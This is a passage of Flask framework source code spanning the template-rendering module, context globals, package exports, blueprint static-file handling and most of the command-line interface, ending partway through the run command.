app.config['IMAGE_STORE_BASE_URL'] = 'http://img.website.com' image_store_config = app.config.get_namespace('IMAGE_STORE_') The resulting dictionary `image_store_config` would look like:: { 'type': 'fs', 'path': '/var/app/images', 'base_url': 'http://img.website.com' } This is often useful when configuration options map directly to keyword arguments in functions or class constructors. :param namespace: a configuration namespace :param lowercase: a flag indicating if the keys of the resulting dictionary should be lowercase :param trim_namespace: a flag indicating if the keys of the resulting dictionary should not include the namespace .. versionadded:: 0.11 """ rv = {} for k, v in self.items(): if not k.startswith(namespace): continue if trim_namespace: key = k[len(namespace) :] else: key = k if lowercase: key = key.lower() rv[key] = v return rv def __repr__(self) -> str: return f"<{type(self).__name__} {dict.__repr__(self)}>" File: src/flask/templating.py from __future__ import annotations import typing as t from jinja2 import BaseLoader from jinja2 import Environment as BaseEnvironment from jinja2 import Template from jinja2 import TemplateNotFound from .globals import _cv_app from .globals import _cv_request from .globals import current_app from .globals import request from .helpers import stream_with_context from .signals import before_render_template from .signals import template_rendered if t.TYPE_CHECKING: # pragma: no cover from .app import Flask from .sansio.app import App from .sansio.scaffold import Scaffold def _default_template_ctx_processor() -> dict[str, t.Any]: """Default template context processor. Injects `request`, `session` and `g`. """ appctx = _cv_app.get(None) reqctx = _cv_request.get(None) rv: dict[str, t.Any] = {} if appctx is not None: rv["g"] = appctx.g if reqctx is not None: rv["request"] = reqctx.request rv["session"] = reqctx.session return rv class Environment(BaseEnvironment): """Works like a regular Jinja2 environment but has some additional knowledge of how Flask's blueprint works so that it can prepend the name of the blueprint to referenced templates if necessary. """ def __init__(self, app: App, **options: t.Any) -> None: if "loader" not in options: options["loader"] = app.create_global_jinja_loader() BaseEnvironment.__init__(self, **options) self.app = app class DispatchingJinjaLoader(BaseLoader): """A loader that looks for templates in the application and all the blueprint folders. """ def __init__(self, app: App) -> None: self.app = app def get_source( self, environment: BaseEnvironment, template: str ) -> tuple[str, str | None, t.Callable[[], bool] | None]: if self.app.config["EXPLAIN_TEMPLATE_LOADING"]: return self._get_source_explained(environment, template) return self._get_source_fast(environment, template) def _get_source_explained( self, environment: BaseEnvironment, template: str ) -> tuple[str, str | None, t.Callable[[], bool] | None]: attempts = [] rv: tuple[str, str | None, t.Callable[[], bool] | None] | None trv: None | (tuple[str, str | None, t.Callable[[], bool] | None]) = None for srcobj, loader in self._iter_loaders(template): try: rv = loader.get_source(environment, template) if trv is None: trv = rv except TemplateNotFound: rv = None attempts.append((loader, srcobj, rv)) from .debughelpers import explain_template_loading_attempts explain_template_loading_attempts(self.app, template, attempts) if trv is not None: return trv raise TemplateNotFound(template) def _get_source_fast( self, environment: BaseEnvironment, template: str ) -> tuple[str, str | None, t.Callable[[], bool] | None]: for _srcobj, loader in self._iter_loaders(template): try: return loader.get_source(environment, template) except TemplateNotFound: continue raise TemplateNotFound(template) def _iter_loaders(self, template: str) -> t.Iterator[tuple[Scaffold, BaseLoader]]: loader = self.app.jinja_loader if loader is not None: yield self.app, loader for blueprint in self.app.iter_blueprints(): loader = blueprint.jinja_loader if loader is not None: yield blueprint, loader def list_templates(self) -> list[str]: result = set() loader = self.app.jinja_loader if loader is not None: result.update(loader.list_templates()) for blueprint in self.app.iter_blueprints(): loader = blueprint.jinja_loader if loader is not None: for template in loader.list_templates(): result.add(template) return list(result) def _render(app: Flask, template: Template, context: dict[str, t.Any]) -> str: app.update_template_context(context) before_render_template.send( app, _async_wrapper=app.ensure_sync, template=template, context=context ) rv = template.render(context) template_rendered.send( app, _async_wrapper=app.ensure_sync, template=template, context=context ) return rv def render_template( template_name_or_list: str | Template | list[str | Template], **context: t.Any, ) -> str: """Render a template by name with the given context. :param template_name_or_list: The name of the template to render. If a list is given, the first name to exist will be rendered. :param context: The variables to make available in the template. """ app = current_app._get_current_object() # type: ignore[attr-defined] template = app.jinja_env.get_or_select_template(template_name_or_list) return _render(app, template, context) def render_template_string(source: str, **context: t.Any) -> str: """Render a template from the given source string with the given context. :param source: The source code of the template to render. :param context: The variables to make available in the template. """ app = current_app._get_current_object() # type: ignore[attr-defined] template = app.jinja_env.from_string(source) return _render(app, template, context) def _stream( app: Flask, template: Template, context: dict[str, t.Any] ) -> t.Iterator[str]: app.update_template_context(context) before_render_template.send( app, _async_wrapper=app.ensure_sync, template=template, context=context ) def generate() -> t.Iterator[str]: yield from template.generate(context) template_rendered.send( app, _async_wrapper=app.ensure_sync, template=template, context=context ) rv = generate() # If a request context is active, keep it while generating. if request: rv = stream_with_context(rv) return rv def stream_template( template_name_or_list: str | Template | list[str | Template], **context: t.Any, ) -> t.Iterator[str]: """Render a template by name with the given context as a stream. This returns an iterator of strings, which can be used as a streaming response from a view. :param template_name_or_list: The name of the template to render. If a list is given, the first name to exist will be rendered. :param context: The variables to make available in the template. .. versionadded:: 2.2 """ app = current_app._get_current_object() # type: ignore[attr-defined] template = app.jinja_env.get_or_select_template(template_name_or_list) return _stream(app, template, context) def stream_template_string(source: str, **context: t.Any) -> t.Iterator[str]: """Render a template from the given source string with the given context as a stream. This returns an iterator of strings, which can be used as a streaming response from a view. :param source: The source code of the template to render. :param context: The variables to make available in the template. .. versionadded:: 2.2 """ app = current_app._get_current_object() # type: ignore[attr-defined] template = app.jinja_env.from_string(source) return _stream(app, template, context) File: src/flask/globals.py from __future__ import annotations import typing as t from contextvars import ContextVar from werkzeug.local import LocalProxy if t.TYPE_CHECKING: # pragma: no cover from .app import Flask from .ctx import _AppCtxGlobals from .ctx import AppContext from .ctx import RequestContext from .sessions import SessionMixin from .wrappers import Request _no_app_msg = """\ Working outside of application context. This typically means that you attempted to use functionality that needed the current application. To solve this, set up an application context with app.app_context(). See the documentation for more information.\ """ _cv_app: ContextVar[AppContext] = ContextVar("flask.app_ctx") app_ctx: AppContext = LocalProxy( # type: ignore[assignment] _cv_app, unbound_message=_no_app_msg ) current_app: Flask = LocalProxy( # type: ignore[assignment] _cv_app, "app", unbound_message=_no_app_msg ) g: _AppCtxGlobals = LocalProxy( # type: ignore[assignment] _cv_app, "g", unbound_message=_no_app_msg ) _no_req_msg = """\ Working outside of request context. This typically means that you attempted to use functionality that needed an active HTTP request. Consult the documentation on testing for information about how to avoid this problem.\ """ _cv_request: ContextVar[RequestContext] = ContextVar("flask.request_ctx") request_ctx: RequestContext = LocalProxy( # type: ignore[assignment] _cv_request, unbound_message=_no_req_msg ) request: Request = LocalProxy( # type: ignore[assignment] _cv_request, "request", unbound_message=_no_req_msg ) session: SessionMixin = LocalProxy( # type: ignore[assignment] _cv_request, "session", unbound_message=_no_req_msg ) File: src/flask/__init__.py from __future__ import annotations import typing as t from . import json as json from .app import Flask as Flask from .blueprints import Blueprint as Blueprint from .config import Config as Config from .ctx import after_this_request as after_this_request from .ctx import copy_current_request_context as copy_current_request_context from .ctx import has_app_context as has_app_context from .ctx import has_request_context as has_request_context from .globals import current_app as current_app from .globals import g as g from .globals import request as request from .globals import session as session from .helpers import abort as abort from .helpers import flash as flash from .helpers import get_flashed_messages as get_flashed_messages from .helpers import get_template_attribute as get_template_attribute from .helpers import make_response as make_response from .helpers import redirect as redirect from .helpers import send_file as send_file from .helpers import send_from_directory as send_from_directory from .helpers import stream_with_context as stream_with_context from .helpers import url_for as url_for from .json import jsonify as jsonify from .signals import appcontext_popped as appcontext_popped from .signals import appcontext_pushed as appcontext_pushed from .signals import appcontext_tearing_down as appcontext_tearing_down from .signals import before_render_template as before_render_template from .signals import got_request_exception as got_request_exception from .signals import message_flashed as message_flashed from .signals import request_finished as request_finished from .signals import request_started as request_started from .signals import request_tearing_down as request_tearing_down from .signals import template_rendered as template_rendered from .templating import render_template as render_template from .templating import render_template_string as render_template_string from .templating import stream_template as stream_template from .templating import stream_template_string as stream_template_string from .wrappers import Request as Request from .wrappers import Response as Response def __getattr__(name: str) -> t.Any: if name == "__version__": import importlib.metadata import warnings warnings.warn( "The '__version__' attribute is deprecated and will be removed in" " Flask 3.1. Use feature detection or" " 'importlib.metadata.version(\"flask\")' instead.", DeprecationWarning, stacklevel=2, ) return importlib.metadata.version("flask") raise AttributeError(name) File: src/flask/blueprints.py from __future__ import annotations import os import typing as t from datetime import timedelta from .cli import AppGroup from .globals import current_app from .helpers import send_from_directory from .sansio.blueprints import Blueprint as SansioBlueprint from .sansio.blueprints import BlueprintSetupState as BlueprintSetupState # noqa from .sansio.scaffold import _sentinel if t.TYPE_CHECKING: # pragma: no cover from .wrappers import Response class Blueprint(SansioBlueprint): def __init__( self, name: str, import_name: str, static_folder: str | os.PathLike[str] | None = None, static_url_path: str | None = None, template_folder: str | os.PathLike[str] | None = None, url_prefix: str | None = None, subdomain: str | None = None, url_defaults: dict[str, t.Any] | None = None, root_path: str | None = None, cli_group: str | None = _sentinel, # type: ignore ) -> None: super().__init__( name, import_name, static_folder, static_url_path, template_folder, url_prefix, subdomain, url_defaults, root_path, cli_group, ) #: The Click command group for registering CLI commands for this #: object. The commands are available from the ``flask`` command #: once the application has been discovered and blueprints have #: been registered. self.cli = AppGroup() # Set the name of the Click group in case someone wants to add # the app's commands to another CLI tool. self.cli.name = self.name def get_send_file_max_age(self, filename: str | None) -> int | None: """Used by :func:`send_file` to determine the ``max_age`` cache value for a given file path if it wasn't passed. By default, this returns :data:`SEND_FILE_MAX_AGE_DEFAULT` from the configuration of :data:`~flask.current_app`. This defaults to ``None``, which tells the browser to use conditional requests instead of a timed cache, which is usually preferable. Note this is a duplicate of the same method in the Flask class. .. versionchanged:: 2.0 The default configuration is ``None`` instead of 12 hours. .. versionadded:: 0.9 """ value = current_app.config["SEND_FILE_MAX_AGE_DEFAULT"] if value is None: return None if isinstance(value, timedelta): return int(value.total_seconds()) return value # type: ignore[no-any-return] def send_static_file(self, filename: str) -> Response: """The view function used to serve files from :attr:`static_folder`. A route is automatically registered for this view at :attr:`static_url_path` if :attr:`static_folder` is set. Note this is a duplicate of the same method in the Flask class. .. versionadded:: 0.5 """ if not self.has_static_folder: raise RuntimeError("'static_folder' must be set to serve static_files.") # send_file only knows to call get_send_file_max_age on the app, # call it here so it works for blueprints too. max_age = self.get_send_file_max_age(filename) return send_from_directory( t.cast(str, self.static_folder), filename, max_age=max_age ) def open_resource( self, resource: str, mode: str = "rb", encoding: str | None = "utf-8" ) -> t.IO[t.AnyStr]: """Open a resource file relative to :attr:`root_path` for reading. The blueprint-relative equivalent of the app's :meth:`~.Flask.open_resource` method. :param resource: Path to the resource relative to :attr:`root_path`. :param mode: Open the file in this mode. Only reading is supported, valid values are ``"r"`` (or ``"rt"``) and ``"rb"``. :param encoding: Open the file with this encoding when opening in text mode. This is ignored when opening in binary mode. .. versionchanged:: 3.1 Added the ``encoding`` parameter. """ if mode not in {"r", "rt", "rb"}: raise ValueError("Resources can only be opened for reading.") path = os.path.join(self.root_path, resource) if mode == "rb": return open(path, mode) return open(path, mode, encoding=encoding) File: src/flask/cli.py from __future__ import annotations import ast import collections.abc as cabc import importlib.metadata import inspect import os import platform import re import sys import traceback import typing as t from functools import update_wrapper from operator import itemgetter from types import ModuleType import click from click.core import ParameterSource from werkzeug import run_simple from werkzeug.serving import is_running_from_reloader from werkzeug.utils import import_string from .globals import current_app from .helpers import get_debug_flag from .helpers import get_load_dotenv if t.TYPE_CHECKING: import ssl from _typeshed.wsgi import StartResponse from _typeshed.wsgi import WSGIApplication from _typeshed.wsgi import WSGIEnvironment from .app import Flask class NoAppException(click.UsageError): """Raised if an application cannot be found or loaded.""" def find_best_app(module: ModuleType) -> Flask: """Given a module instance this tries to find the best possible application in the module or raises an exception. """ from . import Flask # Search for the most common names first. for attr_name in ("app", "application"): app = getattr(module, attr_name, None) if isinstance(app, Flask): return app # Otherwise find the only object that is a Flask instance. matches = [v for v in module.__dict__.values() if isinstance(v, Flask)] if len(matches) == 1: return matches[0] elif len(matches) > 1: raise NoAppException( "Detected multiple Flask applications in module" f" '{module.__name__}'. Use '{module.__name__}:name'" " to specify the correct one." ) # Search for app factory functions. for attr_name in ("create_app", "make_app"): app_factory = getattr(module, attr_name, None) if inspect.isfunction(app_factory): try: app = app_factory() if isinstance(app, Flask): return app except TypeError as e: if not _called_with_wrong_args(app_factory): raise raise NoAppException( f"Detected factory '{attr_name}' in module '{module.__name__}'," " but could not call it without arguments. Use" f" '{module.__name__}:{attr_name}(args)'" " to specify arguments." ) from e raise NoAppException( "Failed to find Flask application or factory in module" f" '{module.__name__}'. Use '{module.__name__}:name'" " to specify one." ) def _called_with_wrong_args(f: t.Callable[..., Flask]) -> bool: """Check whether calling a function raised a ``TypeError`` because the call failed or because something in the factory raised the error. :param f: The function that was called. :return: ``True`` if the call failed. """ tb = sys.exc_info()[2] try: while tb is not None: if tb.tb_frame.f_code is f.__code__: # In the function, it was called successfully. return False tb = tb.tb_next # Didn't reach the function. return True finally: # Delete tb to break a circular reference. # https://docs.python.org/2/library/sys.html#sys.exc_info del tb def find_app_by_string(module: ModuleType, app_name: str) -> Flask: """Check if the given string is a variable name or a function. Call a function to get the app instance, or return the variable directly. """ from . import Flask # Parse app_name as a single expression to determine if it's a valid # attribute name or function call. try: expr = ast.parse(app_name.strip(), mode="eval").body except SyntaxError: raise NoAppException( f"Failed to parse {app_name!r} as an attribute name or function call." ) from None if isinstance(expr, ast.Name): name = expr.id args = [] kwargs = {} elif isinstance(expr, ast.Call): # Ensure the function name is an attribute name only. if not isinstance(expr.func, ast.Name): raise NoAppException( f"Function reference must be a simple name: {app_name!r}." ) name = expr.func.id # Parse the positional and keyword arguments as literals. try: args = [ast.literal_eval(arg) for arg in expr.args] kwargs = { kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords if kw.arg is not None } except ValueError: # literal_eval gives cryptic error messages, show a generic # message with the full expression instead. raise NoAppException( f"Failed to parse arguments as literal values: {app_name!r}." ) from None else: raise NoAppException( f"Failed to parse {app_name!r} as an attribute name or function call." ) try: attr = getattr(module, name) except AttributeError as e: raise NoAppException( f"Failed to find attribute {name!r} in {module.__name__!r}." ) from e # If the attribute is a function, call it with any args and kwargs # to get the real application. if inspect.isfunction(attr): try: app = attr(*args, **kwargs) except TypeError as e: if not _called_with_wrong_args(attr): raise raise NoAppException( f"The factory {app_name!r} in module" f" {module.__name__!r} could not be called with the" " specified arguments." ) from e else: app = attr if isinstance(app, Flask): return app raise NoAppException( "A valid Flask application was not obtained from" f" '{module.__name__}:{app_name}'." ) def prepare_import(path: str) -> str: """Given a filename this will try to calculate the python path, add it to the search path and return the actual module name that is expected. """ path = os.path.realpath(path) fname, ext = os.path.splitext(path) if ext == ".py": path = fname if os.path.basename(path) == "__init__": path = os.path.dirname(path) module_name = [] # move up until outside package structure (no __init__.py) while True: path, name = os.path.split(path) module_name.append(name) if not os.path.exists(os.path.join(path, "__init__.py")): break if sys.path[0] != path: sys.path.insert(0, path) return ".".join(module_name[::-1]) @t.overload def locate_app( module_name: str, app_name: str | None, raise_if_not_found: t.Literal[True] = True ) -> Flask: ... @t.overload def locate_app( module_name: str, app_name: str | None, raise_if_not_found: t.Literal[False] = ... ) -> Flask | None: ... def locate_app( module_name: str, app_name: str | None, raise_if_not_found: bool = True ) -> Flask | None: try: __import__(module_name) except ImportError: # Reraise the ImportError if it occurred within the imported module. # Determine this by checking whether the trace has a depth > 1. if sys.exc_info()[2].tb_next: # type: ignore[union-attr] raise NoAppException( f"While importing {module_name!r}, an ImportError was" f" raised:\n\n{traceback.format_exc()}" ) from None elif raise_if_not_found: raise NoAppException(f"Could not import {module_name!r}.") from None else: return None module = sys.modules[module_name] if app_name is None: return find_best_app(module) else: return find_app_by_string(module, app_name) def get_version(ctx: click.Context, param: click.Parameter, value: t.Any) -> None: if not value or ctx.resilient_parsing: return flask_version = importlib.metadata.version("flask") werkzeug_version = importlib.metadata.version("werkzeug") click.echo( f"Python {platform.python_version()}\n" f"Flask {flask_version}\n" f"Werkzeug {werkzeug_version}", color=ctx.color, ) ctx.exit() version_option = click.Option( ["--version"], help="Show the Flask version.", expose_value=False, callback=get_version, is_flag=True, is_eager=True, ) class ScriptInfo: """Helper object to deal with Flask applications. This is usually not necessary to interface with as it's used internally in the dispatching to click. In future versions of Flask this object will most likely play a bigger role. Typically it's created automatically by the :class:`FlaskGroup` but you can also manually create it and pass it onwards as click object. """ def __init__( self, app_import_path: str | None = None, create_app: t.Callable[..., Flask] | None = None, set_debug_flag: bool = True, ) -> None: #: Optionally the import path for the Flask application. self.app_import_path = app_import_path #: Optionally a function that is passed the script info to create #: the instance of the application. self.create_app = create_app #: A dictionary with arbitrary data that can be associated with #: this script info. self.data: dict[t.Any, t.Any] = {} self.set_debug_flag = set_debug_flag self._loaded_app: Flask | None = None def load_app(self) -> Flask: """Loads the Flask app (if not yet loaded) and returns it. Calling this multiple times will just result in the already loaded app to be returned. """ if self._loaded_app is not None: return self._loaded_app if self.create_app is not None: app: Flask | None = self.create_app() else: if self.app_import_path: path, name = ( re.split(r":(?![\\/])", self.app_import_path, maxsplit=1) + [None] )[:2] import_name = prepare_import(path) app = locate_app(import_name, name) else: for path in ("wsgi.py", "app.py"): import_name = prepare_import(path) app = locate_app(import_name, None, raise_if_not_found=False) if app is not None: break if app is None: raise NoAppException( "Could not locate a Flask application. Use the" " 'flask --app' option, 'FLASK_APP' environment" " variable, or a 'wsgi.py' or 'app.py' file in the" " current directory." ) if self.set_debug_flag: # Update the app's debug flag through the descriptor so that # other values repopulate as well. app.debug = get_debug_flag() self._loaded_app = app return app pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True) F = t.TypeVar("F", bound=t.Callable[..., t.Any]) def with_appcontext(f: F) -> F: """Wraps a callback so that it's guaranteed to be executed with the script's application context. Custom commands (and their options) registered under ``app.cli`` or ``blueprint.cli`` will always have an app context available, this decorator is not required in that case. .. versionchanged:: 2.2 The app context is active for subcommands as well as the decorated callback. The app context is always available to ``app.cli`` command and parameter callbacks. """ @click.pass_context def decorator(ctx: click.Context, /, *args: t.Any, **kwargs: t.Any) -> t.Any: if not current_app: app = ctx.ensure_object(ScriptInfo).load_app() ctx.with_resource(app.app_context()) return ctx.invoke(f, *args, **kwargs) return update_wrapper(decorator, f) # type: ignore[return-value] class AppGroup(click.Group): """This works similar to a regular click :class:`~click.Group` but it changes the behavior of the :meth:`command` decorator so that it automatically wraps the functions in :func:`with_appcontext`. Not to be confused with :class:`FlaskGroup`. """ def command( # type: ignore[override] self, *args: t.Any, **kwargs: t.Any ) -> t.Callable[[t.Callable[..., t.Any]], click.Command]: """This works exactly like the method of the same name on a regular :class:`click.Group` but it wraps callbacks in :func:`with_appcontext` unless it's disabled by passing ``with_appcontext=False``. """ wrap_for_ctx = kwargs.pop("with_appcontext", True) def decorator(f: t.Callable[..., t.Any]) -> click.Command: if wrap_for_ctx: f = with_appcontext(f) return super(AppGroup, self).command(*args, **kwargs)(f) # type: ignore[no-any-return] return decorator def group( # type: ignore[override] self, *args: t.Any, **kwargs: t.Any ) -> t.Callable[[t.Callable[..., t.Any]], click.Group]: """This works exactly like the method of the same name on a regular :class:`click.Group` but it defaults the group class to :class:`AppGroup`. """ kwargs.setdefault("cls", AppGroup) return super().group(*args, **kwargs) # type: ignore[no-any-return] def _set_app(ctx: click.Context, param: click.Option, value: str | None) -> str | None: if value is None: return None info = ctx.ensure_object(ScriptInfo) info.app_import_path = value return value # This option is eager so the app will be available if --help is given. # --help is also eager, so --app must be before it in the param list. # no_args_is_help bypasses eager processing, so this option must be # processed manually in that case to ensure FLASK_APP gets picked up. _app_option = click.Option( ["-A", "--app"], metavar="IMPORT", help=( "The Flask application or factory function to load, in the form 'module:name'." " Module can be a dotted import or file path. Name is not required if it is" " 'app', 'application', 'create_app', or 'make_app', and can be 'name(args)' to" " pass arguments." ), is_eager=True, expose_value=False, callback=_set_app, ) def _set_debug(ctx: click.Context, param: click.Option, value: bool) -> bool | None: # If the flag isn't provided, it will default to False. Don't use # that, let debug be set by env in that case. source = ctx.get_parameter_source(param.name) # type: ignore[arg-type] if source is not None and source in ( ParameterSource.DEFAULT, ParameterSource.DEFAULT_MAP, ): return None # Set with env var instead of ScriptInfo.load so that it can be # accessed early during a factory function. os.environ["FLASK_DEBUG"] = "1" if value else "0" return value _debug_option = click.Option( ["--debug/--no-debug"], help="Set debug mode.", expose_value=False, callback=_set_debug, ) def _env_file_callback( ctx: click.Context, param: click.Option, value: str | None ) -> str | None: if value is None: return None import importlib try: importlib.import_module("dotenv") except ImportError: raise click.BadParameter( "python-dotenv must be installed to load an env file.", ctx=ctx, param=param, ) from None # Don't check FLASK_SKIP_DOTENV, that only disables automatically # loading .env and .flaskenv files. load_dotenv(value) return value # This option is eager so env vars are loaded as early as possible to be # used by other options. _env_file_option = click.Option( ["-e", "--env-file"], type=click.Path(exists=True, dir_okay=False), help="Load environment variables from this file. python-dotenv must be installed.", is_eager=True, expose_value=False, callback=_env_file_callback, ) class FlaskGroup(AppGroup): """Special subclass of the :class:`AppGroup` group that supports loading more commands from the configured Flask app. Normally a developer does not have to interface with this class but there are some very advanced use cases for which it makes sense to create an instance of this. see :ref:`custom-scripts`. :param add_default_commands: if this is True then the default run and shell commands will be added. :param add_version_option: adds the ``--version`` option. :param create_app: an optional callback that is passed the script info and returns the loaded app. :param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv` files to set environment variables. Will also change the working directory to the directory containing the first file found. :param set_debug_flag: Set the app's debug flag. .. versionchanged:: 2.2 Added the ``-A/--app``, ``--debug/--no-debug``, ``-e/--env-file`` options. .. versionchanged:: 2.2 An app context is pushed when running ``app.cli`` commands, so ``@with_appcontext`` is no longer required for those commands. .. versionchanged:: 1.0 If installed, python-dotenv will be used to load environment variables from :file:`.env` and :file:`.flaskenv` files. """ def __init__( self, add_default_commands: bool = True, create_app: t.Callable[..., Flask] | None = None, add_version_option: bool = True, load_dotenv: bool = True, set_debug_flag: bool = True, **extra: t.Any, ) -> None: params = list(extra.pop("params", None) or ()) # Processing is done with option callbacks instead of a group # callback. This allows users to make a custom group callback # without losing the behavior. --env-file must come first so # that it is eagerly evaluated before --app. params.extend((_env_file_option, _app_option, _debug_option)) if add_version_option: params.append(version_option) if "context_settings" not in extra: extra["context_settings"] = {} extra["context_settings"].setdefault("auto_envvar_prefix", "FLASK") super().__init__(params=params, **extra) self.create_app = create_app self.load_dotenv = load_dotenv self.set_debug_flag = set_debug_flag if add_default_commands: self.add_command(run_command) self.add_command(shell_command) self.add_command(routes_command) self._loaded_plugin_commands = False def _load_plugin_commands(self) -> None: if self._loaded_plugin_commands: return if sys.version_info >= (3, 10): from importlib import metadata else: # Use a backport on Python < 3.10. We technically have # importlib.metadata on 3.8+, but the API changed in 3.10, # so use the backport for consistency. import importlib_metadata as metadata for ep in metadata.entry_points(group="flask.commands"): self.add_command(ep.load(), ep.name) self._loaded_plugin_commands = True def get_command(self, ctx: click.Context, name: str) -> click.Command | None: self._load_plugin_commands() # Look up built-in and plugin commands, which should be # available even if the app fails to load. rv = super().get_command(ctx, name) if rv is not None: return rv info = ctx.ensure_object(ScriptInfo) # Look up commands provided by the app, showing an error and # continuing if the app couldn't be loaded. try: app = info.load_app() except NoAppException as e: click.secho(f"Error: {e.format_message()}\n", err=True, fg="red") return None # Push an app context for the loaded app unless it is already # active somehow. This makes the context available to parameter # and command callbacks without needing @with_appcontext. if not current_app or current_app._get_current_object() is not app: # type: ignore[attr-defined] ctx.with_resource(app.app_context()) return app.cli.get_command(ctx, name) def list_commands(self, ctx: click.Context) -> list[str]: self._load_plugin_commands() # Start with the built-in and plugin commands. rv = set(super().list_commands(ctx)) info = ctx.ensure_object(ScriptInfo) # Add commands provided by the app, showing an error and # continuing if the app couldn't be loaded. try: rv.update(info.load_app().cli.list_commands(ctx)) except NoAppException as e: # When an app couldn't be loaded, show the error message # without the traceback. click.secho(f"Error: {e.format_message()}\n", err=True, fg="red") except Exception: # When any other errors occurred during loading, show the # full traceback. click.secho(f"{traceback.format_exc()}\n", err=True, fg="red") return sorted(rv) def make_context( self, info_name: str | None, args: list[str], parent: click.Context | None = None, **extra: t.Any, ) -> click.Context: # Set a flag to tell app.run to become a no-op. If app.run was # not in a __name__ == __main__ guard, it would start the server # when importing, blocking whatever command is being called. os.environ["FLASK_RUN_FROM_CLI"] = "true" # Attempt to load .env and .flask env files. The --env-file # option can cause another file to be loaded. if get_load_dotenv(self.load_dotenv): load_dotenv() if "obj" not in extra and "obj" not in self.context_settings: extra["obj"] = ScriptInfo( create_app=self.create_app, set_debug_flag=self.set_debug_flag ) return super().make_context(info_name, args, parent=parent, **extra) def parse_args(self, ctx: click.Context, args: list[str]) -> list[str]: if not args and self.no_args_is_help: # Attempt to load --env-file and --app early in case they # were given as env vars. Otherwise no_args_is_help will not # see commands from app.cli. _env_file_option.handle_parse_result(ctx, {}, []) _app_option.handle_parse_result(ctx, {}, []) return super().parse_args(ctx, args) def _path_is_ancestor(path: str, other: str) -> bool: """Take ``other`` and remove the length of ``path`` from it. Then join it to ``path``. If it is the original value, ``path`` is an ancestor of ``other``.""" return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other def load_dotenv(path: str | os.PathLike[str] | None = None) -> bool: """Load "dotenv" files in order of precedence to set environment variables. If an env var is already set it is not overwritten, so earlier files in the list are preferred over later files. This is a no-op if `python-dotenv`_ is not installed. .. _python-dotenv: https://github.com/theskumar/python-dotenv#readme :param path: Load the file at this location instead of searching. :return: ``True`` if a file was loaded. .. versionchanged:: 2.0 The current directory is not changed to the location of the loaded file. .. versionchanged:: 2.0 When loading the env files, set the default encoding to UTF-8. .. versionchanged:: 1.1.0 Returns ``False`` when python-dotenv is not installed, or when the given path isn't a file. .. versionadded:: 1.0 """ try: import dotenv except ImportError: if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"): click.secho( " * Tip: There are .env or .flaskenv files present." ' Do "pip install python-dotenv" to use them.', fg="yellow", err=True, ) return False # Always return after attempting to load a given path, don't load # the default files. if path is not None: if os.path.isfile(path): return dotenv.load_dotenv(path, encoding="utf-8") return False loaded = False for name in (".env", ".flaskenv"): path = dotenv.find_dotenv(name, usecwd=True) if not path: continue dotenv.load_dotenv(path, encoding="utf-8") loaded = True return loaded # True if at least one file was located and loaded. def show_server_banner(debug: bool, app_import_path: str | None) -> None: """Show extra startup messages the first time the server is run, ignoring the reloader. """ if is_running_from_reloader(): return if app_import_path is not None: click.echo(f" * Serving Flask app '{app_import_path}'") if debug is not None: click.echo(f" * Debug mode: {'on' if debug else 'off'}") class CertParamType(click.ParamType): """Click option type for the ``--cert`` option. Allows either an existing file, the string ``'adhoc'``, or an import for a :class:`~ssl.SSLContext` object. """ name = "path" def __init__(self) -> None: self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True) def convert( self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None ) -> t.Any: try: import ssl except ImportError: raise click.BadParameter( 'Using "--cert" requires Python to be compiled with SSL support.', ctx, param, ) from None try: return self.path_type(value, param, ctx) except click.BadParameter: value = click.STRING(value, param, ctx).lower() if value == "adhoc": try: import cryptography # noqa: F401 except ImportError: raise click.BadParameter( "Using ad-hoc certificates requires the cryptography library.", ctx, param, ) from None return value obj = import_string(value, silent=True) if isinstance(obj, ssl.SSLContext): return obj raise def _validate_key(ctx: click.Context, param: click.Parameter, value: t.Any) -> t.Any: """The ``--key`` option must be specified when ``--cert`` is a file. Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed. """ cert = ctx.params.get("cert") is_adhoc = cert == "adhoc" try: import ssl except ImportError: is_context = False else: is_context = isinstance(cert, ssl.SSLContext) if value is not None: if is_adhoc: raise click.BadParameter( 'When "--cert" is "adhoc", "--key" is not used.', ctx, param ) if is_context: raise click.BadParameter( 'When "--cert" is an SSLContext object, "--key" is not used.', ctx, param, ) if not cert: raise click.BadParameter('"--cert" must also be specified.', ctx, param) ctx.params["cert"] = cert, value else: if cert and not (is_adhoc or is_context): raise click.BadParameter('Required when using "--cert".', ctx, param) return value class SeparatedPathType(click.Path): """Click option type that accepts a list of values separated by the OS's path separator (``:``, ``;`` on Windows). Each value is validated as a :class:`click.Path` type. """ def convert( self, value: t.Any, param: click.Parameter | None, ctx: click.Context | None ) -> t.Any: items = self.split_envvar_value(value) # can't call no-arg super() inside list comprehension until Python 3.12 super_convert = super().convert return [super_convert(item, param, ctx) for item in items] @click.command("run", short_help="Run a development server.") @click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.") @click.option("--port", "-p", default=5000, help="The port to bind to.") @click.option( "--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS.", is_eager=True, ) @click.option( "--key", type=click.Path(exists=True, dir_okay=False, resolve_path=True), callback=_validate_key, expose_value=False, help="The key file to use when specifying a certificate.", ) @click.option( "--reload/--no-reload", default=None, help="Enable or disable the reloader. By default the reloader " "is active if debug is enabled.", ) @click.option( "--debugger/--no-debugger", default=None, help="Enable or disable the debugger. By default the debugger " "is active if debug is enabled.", ) @click.option( "--with-threads/--without-threads", default=True, help="Enable or disable multithreading.", ) @click.option( "--extra-files", default=None, type=SeparatedPathType(), help=( "Extra files that trigger a reload on change. Multiple paths" f" are separated by {os.path.pathsep!r}." ), ) @click.option( "--exclude-patterns", default=None, type=SeparatedPathType(), help=( "Files matching these fnmatch patterns will not trigger a reload" " on change. Multiple patterns are separated by" f" {os.path.pathsep!r}." ), ) @pass_script_info def run_command( info: ScriptInfo, host: str, port: int, reload: bool, debugger: bool, with_threads: bool, cert: ssl.SSLContext | tuple[str, str | None] | t.Literal["adhoc"] | None, extra_files: list[str] | None, exclude_patterns: list[str] | None, ) -> None: """Run a local development server. This server is for development purposes only. It does not provide the stability, security, or performance of production WSGI servers. The reloader and debugger are enabled by default with the '--debug' option. """ try: app: WSGIApplication = info.load_app() except Exception as e: if is_running_from_reloader(): # When reloading, print out the error immediately, but raise # it later so the 